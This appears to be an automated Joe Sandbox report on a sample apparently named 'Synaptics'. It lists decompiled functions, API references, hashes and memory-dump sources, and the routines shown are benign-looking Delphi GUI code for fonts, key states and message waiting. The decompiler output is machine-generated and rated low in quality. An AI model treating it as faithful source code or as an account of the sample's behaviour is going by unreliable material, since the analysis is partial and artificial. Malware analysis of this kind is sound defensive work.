                                                                                                                                                                                                                            • Opcode ID: d6c3b155004564497a934944e9fb1a4da8376012889de431701f3198bbbb3ef4
                                                                                                                                                                                                                            • Instruction ID: 57ffb722b27d6620bd0413708f68fc30d075597d86d482f7219fb2c4a52a2897
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6c3b155004564497a934944e9fb1a4da8376012889de431701f3198bbbb3ef4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60F0D0B1A88301AEF710E7269C06F163655A724B1BF10413FF606791D2CFBC64888B1D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00460AA0 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                                                                                            			E00460AA0(signed int __eax) {
				signed int _t1;
				signed int _t2;

				_t1 = __eax;
				_push(0);
				L00407638();
				_t2 = __eax;
				_push(0xc);
				_push(__eax);
				L00407380();
				_push(0xe);
				_push(__eax);
				L00407380();
				if(__eax * __eax > 8) {
					 *0x49c08f = 0;
				} else {
					 *0x49c08f = 1;
				}
				_push(_t2);
				_push(0);
				L00407888();
				return _t1;
			}





                                                                                                                                                                                                                            0x00460aa0
                                                                                                                                                                                                                            0x00460aa2
                                                                                                                                                                                                                            0x00460aa4
                                                                                                                                                                                                                            0x00460aa9
                                                                                                                                                                                                                            0x00460aab
                                                                                                                                                                                                                            0x00460aad
                                                                                                                                                                                                                            0x00460aae
                                                                                                                                                                                                                            0x00460ab5
                                                                                                                                                                                                                            0x00460ab7
                                                                                                                                                                                                                            0x00460ab8
                                                                                                                                                                                                                            0x00460ac3
                                                                                                                                                                                                                            0x00460ace
                                                                                                                                                                                                                            0x00460ac5
                                                                                                                                                                                                                            0x00460ac5
                                                                                                                                                                                                                            0x00460ac5
                                                                                                                                                                                                                            0x00460ad5
                                                                                                                                                                                                                            0x00460ad6
                                                                                                                                                                                                                            0x00460ad8
                                                                                                                                                                                                                            0x00460adf

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AA4
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AAE
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AB8
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AD8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 120756276-0
                                                                                                                                                                                                                            • Opcode ID: 5cfe53fac7e6379baf7f1ecede3d93521c5abd9aeb3c7497eb158e8bc020ce62
                                                                                                                                                                                                                            • Instruction ID: e5fe4370b8b3d872c1f259c9bd4e612fc1c14159820c3ed1a6be214ca3dc50fe
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cfe53fac7e6379baf7f1ecede3d93521c5abd9aeb3c7497eb158e8bc020ce62
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE08C52A49354A8F26032B90C87B6B094C8B213A9F04443BFD017A1C3E4BD1C4492BF
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00424E24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E00424E24(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x424fad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E00424FB4);
					return E004049E4( &_v80, 3);
				} else {
					_t76 =  *0x49e8e0; // 0x21e0a30
					E00424168(_t76);
					_push(_t137);
					_push(0x424f85);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E00404C24( &_v72, _v8 + 0x1b);
						if(E00408F88(_v72, "Default") != 0) {
							E00404C24( &_v80, _v8 + 0x1b);
							E0040A020( &(_v68.lfFaceName), _v80);
						} else {
							E00404C24( &_v76, "\rMS Sans Serif");
							E0040A020( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E00425108(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(E00424F8C);
					_t81 =  *0x49e8e0; // 0x21e0a30
					return E00424174(_t81);
				}
			}
















                                                                                                                                                                                                                            0x00424e25
                                                                                                                                                                                                                            0x00424e27
                                                                                                                                                                                                                            0x00424e2d
                                                                                                                                                                                                                            0x00424e30
                                                                                                                                                                                                                            0x00424e33
                                                                                                                                                                                                                            0x00424e36
                                                                                                                                                                                                                            0x00424e3a
                                                                                                                                                                                                                            0x00424e3b
                                                                                                                                                                                                                            0x00424e40
                                                                                                                                                                                                                            0x00424e43
                                                                                                                                                                                                                            0x00424e49
                                                                                                                                                                                                                            0x00424e53
                                                                                                                                                                                                                            0x00424f97
                                                                                                                                                                                                                            0x00424f9a
                                                                                                                                                                                                                            0x00424fac
                                                                                                                                                                                                                            0x00424e59
                                                                                                                                                                                                                            0x00424e59
                                                                                                                                                                                                                            0x00424e5e
                                                                                                                                                                                                                            0x00424e65
                                                                                                                                                                                                                            0x00424e66
                                                                                                                                                                                                                            0x00424e6b
                                                                                                                                                                                                                            0x00424e6e
                                                                                                                                                                                                                            0x00424e78
                                                                                                                                                                                                                            0x00424e84
                                                                                                                                                                                                                            0x00424e89
                                                                                                                                                                                                                            0x00424e8e
                                                                                                                                                                                                                            0x00424e93
                                                                                                                                                                                                                            0x00424e9d
                                                                                                                                                                                                                            0x00424ea8
                                                                                                                                                                                                                            0x00424e9f
                                                                                                                                                                                                                            0x00424e9f
                                                                                                                                                                                                                            0x00424e9f
                                                                                                                                                                                                                            0x00424eb9
                                                                                                                                                                                                                            0x00424ec6
                                                                                                                                                                                                                            0x00424ed3
                                                                                                                                                                                                                            0x00424edc
                                                                                                                                                                                                                            0x00424ee8
                                                                                                                                                                                                                            0x00424efc
                                                                                                                                                                                                                            0x00424f21
                                                                                                                                                                                                                            0x00424f2c
                                                                                                                                                                                                                            0x00424efe
                                                                                                                                                                                                                            0x00424f06
                                                                                                                                                                                                                            0x00424f11
                                                                                                                                                                                                                            0x00424f11
                                                                                                                                                                                                                            0x00424f31
                                                                                                                                                                                                                            0x00424f35
                                                                                                                                                                                                                            0x00424f39
                                                                                                                                                                                                                            0x00424f44
                                                                                                                                                                                                                            0x00424f46
                                                                                                                                                                                                                            0x00424f4e
                                                                                                                                                                                                                            0x00424f48
                                                                                                                                                                                                                            0x00424f4a
                                                                                                                                                                                                                            0x00424f54
                                                                                                                                                                                                                            0x00424f4c
                                                                                                                                                                                                                            0x00424f5a
                                                                                                                                                                                                                            0x00424f5a
                                                                                                                                                                                                                            0x00424f4a
                                                                                                                                                                                                                            0x00424f6a
                                                                                                                                                                                                                            0x00424f6a
                                                                                                                                                                                                                            0x00424f6f
                                                                                                                                                                                                                            0x00424f72
                                                                                                                                                                                                                            0x00424f75
                                                                                                                                                                                                                            0x00424f7a
                                                                                                                                                                                                                            0x00424f84
                                                                                                                                                                                                                            0x00424f84

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00424168: RtlEnterCriticalSection.KERNEL32(?,004241A5,004235EC,00000001), ref: 0042416C
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateCriticalEnterFontIndirectSection
                                                                                                                                                                                                                            • String ID: MS Sans Serif$Default
                                                                                                                                                                                                                            • API String ID: 2931345757-2137701257
                                                                                                                                                                                                                            • Opcode ID: 1e26f0c9b99a2504c18667f81a18e76453e69d059f0a10168dcf74c802a2ab4c
                                                                                                                                                                                                                            • Instruction ID: b3d76d3ca7c544b37bc71fdcf573607e07253616adc25b4daf7a036753d91774
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e26f0c9b99a2504c18667f81a18e76453e69d059f0a10168dcf74c802a2ab4c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16517F31B04258DFDB01DFA4D641B8DBBF6EF88304FA640AAE804A7352D3389E05DB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044E02C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E0044E02C(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x49ebac; // 0x21e0da8
					E0042C30C(_t34,  &_v24);
					_push(_t69);
					_push(0x44e12a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E0044DD30(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x44e131);
							_t40 =  *0x49ebac; // 0x21e0da8
							return E0042C304(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x49ebac; // 0x21e0da8
					E0042C30C(_t42,  &_v8);
					_push(_t69);
					_push(0x44e0ff);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E0044DED8( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x44e106);
					_t48 =  *0x49ebac; // 0x21e0da8
					return E0042C304(_t48);
				}
				L14:
			}


















                                                                                                                                                                                                                            0x0044e02d
                                                                                                                                                                                                                            0x0044e02f
                                                                                                                                                                                                                            0x0044e033
                                                                                                                                                                                                                            0x0044e035
                                                                                                                                                                                                                            0x0044e03f
                                                                                                                                                                                                                            0x0044e048
                                                                                                                                                                                                                            0x0044e147
                                                                                                                                                                                                                            0x0044e04e
                                                                                                                                                                                                                            0x0044e058
                                                                                                                                                                                                                            0x0044e05a
                                                                                                                                                                                                                            0x0044e05a
                                                                                                                                                                                                                            0x0044e06a
                                                                                                                                                                                                                            0x0044e06c
                                                                                                                                                                                                                            0x0044e06c
                                                                                                                                                                                                                            0x0044e076
                                                                                                                                                                                                                            0x0044e078
                                                                                                                                                                                                                            0x0044e078
                                                                                                                                                                                                                            0x0044e084
                                                                                                                                                                                                                            0x0044e08a
                                                                                                                                                                                                                            0x0044e08f
                                                                                                                                                                                                                            0x0044e096
                                                                                                                                                                                                                            0x0044e097
                                                                                                                                                                                                                            0x0044e09c
                                                                                                                                                                                                                            0x0044e09f
                                                                                                                                                                                                                            0x0044e0a2
                                                                                                                                                                                                                            0x0044e0a2
                                                                                                                                                                                                                            0x0044e0b4
                                                                                                                                                                                                                            0x0044e0bb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044e10a
                                                                                                                                                                                                                            0x0044e114
                                                                                                                                                                                                                            0x0044e117
                                                                                                                                                                                                                            0x0044e11a
                                                                                                                                                                                                                            0x0044e11f
                                                                                                                                                                                                                            0x0044e129
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044e10a
                                                                                                                                                                                                                            0x0044e0c0
                                                                                                                                                                                                                            0x0044e0c5
                                                                                                                                                                                                                            0x0044e0cc
                                                                                                                                                                                                                            0x0044e0cd
                                                                                                                                                                                                                            0x0044e0d2
                                                                                                                                                                                                                            0x0044e0d5
                                                                                                                                                                                                                            0x0044e0e4
                                                                                                                                                                                                                            0x0044e0e9
                                                                                                                                                                                                                            0x0044e0ec
                                                                                                                                                                                                                            0x0044e0ef
                                                                                                                                                                                                                            0x0044e0f4
                                                                                                                                                                                                                            0x0044e0fe
                                                                                                                                                                                                                            0x0044e0fe
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 0044E050
                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0044E062
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: State
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1649606143-3916222277
                                                                                                                                                                                                                            • Opcode ID: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                                                                                                                                                                                            • Instruction ID: dd991a499b8bdb83682dc26b7e7e078d12a516ef0c40e0bf5f2210f7bad781b1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D231F731A04218AFEB11DFA6E84179EB7F5FB48314F50C4BBEC00A6291E77C5A00D668
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045AE50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81threadwindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E0045AE50(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t52;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __esi;
				_t71 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x45af60);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t56 = E0045ADD8(_v8);
				if( *((char*)(_v8 + 0x88)) != 0) {
					_t52 = _v8;
					_t79 =  *((intOrPtr*)(_t52 + 0x48));
					if( *((intOrPtr*)(_t52 + 0x48)) == 0) {
						E0045B3A8(_v8);
					}
				}
				E00458DF8(_t56,  &_v20);
				E004380E0(_v20, 0,  &_v16, _t79);
				_t36 =  *0x49ebb8; // 0x21e1714
				E0045B010(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x45af07);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *((short*)(_v8 + 0x102)) != 0) {
					_t56 = _v8;
					 *((intOrPtr*)(_v8 + 0x100))();
				}
				if(_v9 != 0) {
					E0045AD74();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x49de40; // 0x49e034
				if(_t41 ==  *_t67 && E004214B8(0, _t56, _t71, _t72) != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E0045AF67);
				return E004049E4( &_v20, 2);
			}
















                                                                                                                                                                                                                            0x0045ae50
                                                                                                                                                                                                                            0x0045ae50
                                                                                                                                                                                                                            0x0045ae51
                                                                                                                                                                                                                            0x0045ae53
                                                                                                                                                                                                                            0x0045ae56
                                                                                                                                                                                                                            0x0045ae57
                                                                                                                                                                                                                            0x0045ae58
                                                                                                                                                                                                                            0x0045ae5b
                                                                                                                                                                                                                            0x0045ae5e
                                                                                                                                                                                                                            0x0045ae61
                                                                                                                                                                                                                            0x0045ae66
                                                                                                                                                                                                                            0x0045ae67
                                                                                                                                                                                                                            0x0045ae6c
                                                                                                                                                                                                                            0x0045ae6f
                                                                                                                                                                                                                            0x0045ae7a
                                                                                                                                                                                                                            0x0045ae86
                                                                                                                                                                                                                            0x0045ae88
                                                                                                                                                                                                                            0x0045ae8b
                                                                                                                                                                                                                            0x0045ae8f
                                                                                                                                                                                                                            0x0045ae94
                                                                                                                                                                                                                            0x0045ae94
                                                                                                                                                                                                                            0x0045ae8f
                                                                                                                                                                                                                            0x0045ae9e
                                                                                                                                                                                                                            0x0045aea9
                                                                                                                                                                                                                            0x0045aeb1
                                                                                                                                                                                                                            0x0045aeb6
                                                                                                                                                                                                                            0x0045aebb
                                                                                                                                                                                                                            0x0045aec1
                                                                                                                                                                                                                            0x0045aec2
                                                                                                                                                                                                                            0x0045aec7
                                                                                                                                                                                                                            0x0045aeca
                                                                                                                                                                                                                            0x0045aed8
                                                                                                                                                                                                                            0x0045aedd
                                                                                                                                                                                                                            0x0045aee9
                                                                                                                                                                                                                            0x0045aee9
                                                                                                                                                                                                                            0x0045aef3
                                                                                                                                                                                                                            0x0045aef8
                                                                                                                                                                                                                            0x0045aef8
                                                                                                                                                                                                                            0x0045aeff
                                                                                                                                                                                                                            0x0045af02
                                                                                                                                                                                                                            0x0045af1c
                                                                                                                                                                                                                            0x0045af21
                                                                                                                                                                                                                            0x0045af29
                                                                                                                                                                                                                            0x0045af36
                                                                                                                                                                                                                            0x0045af36
                                                                                                                                                                                                                            0x0045af3e
                                                                                                                                                                                                                            0x0045af40
                                                                                                                                                                                                                            0x0045af40
                                                                                                                                                                                                                            0x0045af47
                                                                                                                                                                                                                            0x0045af4a
                                                                                                                                                                                                                            0x0045af4d
                                                                                                                                                                                                                            0x0045af5f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0045ADD8: GetCursorPos.USER32 ref: 0045ADE1
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0045AF1C
                                                                                                                                                                                                                            • WaitMessage.USER32(00000000,0045AF60,?,?,?,0049ABD1), ref: 0045AF40
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentCursorMessageThreadWait
                                                                                                                                                                                                                            • String ID: 4I
                                                                                                                                                                                                                            • API String ID: 535285469-2364942553
                                                                                                                                                                                                                            • Opcode ID: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                                                                                                                                                                                            • Instruction ID: 3d320c2a842818ba80bdb21166925b08477e9e3b0af4457c4c140f173818ef6e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F431D670A04208EFDB01DF65C846BAEB7F5EB05305F6145BAEC00A7392D7796E58C71A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042A3E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 59%
                                                                                                                                                                                                                            			E0042A3E8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E00403BBC(1);
				_push(_t77);
				_push(0x42a46f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x418ef8; // 0x418f44
				 *((intOrPtr*)(_v12 + 0x6c)) = E00403D9C(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x49e8b0);
				L00406FE0();
				_push(_t77);
				_push(0x42a4cf);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E00428E70( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00428E6C(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x42a4d6);
				_push(0x49e8b0);
				L004071A0();
				return 0;
			}












                                                                                                                                                                                                                            0x0042a3e9
                                                                                                                                                                                                                            0x0042a3eb
                                                                                                                                                                                                                            0x0042a3f5
                                                                                                                                                                                                                            0x0042a404
                                                                                                                                                                                                                            0x0042a409
                                                                                                                                                                                                                            0x0042a40a
                                                                                                                                                                                                                            0x0042a40f
                                                                                                                                                                                                                            0x0042a412
                                                                                                                                                                                                                            0x0042a418
                                                                                                                                                                                                                            0x0042a41e
                                                                                                                                                                                                                            0x0042a431
                                                                                                                                                                                                                            0x0042a431
                                                                                                                                                                                                                            0x0042a439
                                                                                                                                                                                                                            0x0042a443
                                                                                                                                                                                                                            0x0042a44e
                                                                                                                                                                                                                            0x0042a44e
                                                                                                                                                                                                                            0x0042a454
                                                                                                                                                                                                                            0x0042a462
                                                                                                                                                                                                                            0x0042a467
                                                                                                                                                                                                                            0x0042a46a
                                                                                                                                                                                                                            0x0042a486
                                                                                                                                                                                                                            0x0042a48b
                                                                                                                                                                                                                            0x0042a492
                                                                                                                                                                                                                            0x0042a493
                                                                                                                                                                                                                            0x0042a498
                                                                                                                                                                                                                            0x0042a49b
                                                                                                                                                                                                                            0x0042a4a4
                                                                                                                                                                                                                            0x0042a4af
                                                                                                                                                                                                                            0x0042a4b2
                                                                                                                                                                                                                            0x0042a4b9
                                                                                                                                                                                                                            0x0042a4bc
                                                                                                                                                                                                                            0x0042a4bf
                                                                                                                                                                                                                            0x0042a4c4
                                                                                                                                                                                                                            0x0042a4c9
                                                                                                                                                                                                                            0x0042a4ce

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E8B0), ref: 0042A48B
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E8B0,0042A4D6,0049E8B0), ref: 0042A4C9
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                            • String ID: P>B
                                                                                                                                                                                                                            • API String ID: 3168844106-1256901731
                                                                                                                                                                                                                            • Opcode ID: ca0b5ea70abbbc64981b48c8f213be05788fe1696cd43ae5739105b4e8816b91
                                                                                                                                                                                                                            • Instruction ID: 63024a2a2f57267be46c6b4524dac06f3360d3f79ec1ca4db72fa5e9cc5c2d4b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca0b5ea70abbbc64981b48c8f213be05788fe1696cd43ae5739105b4e8816b91
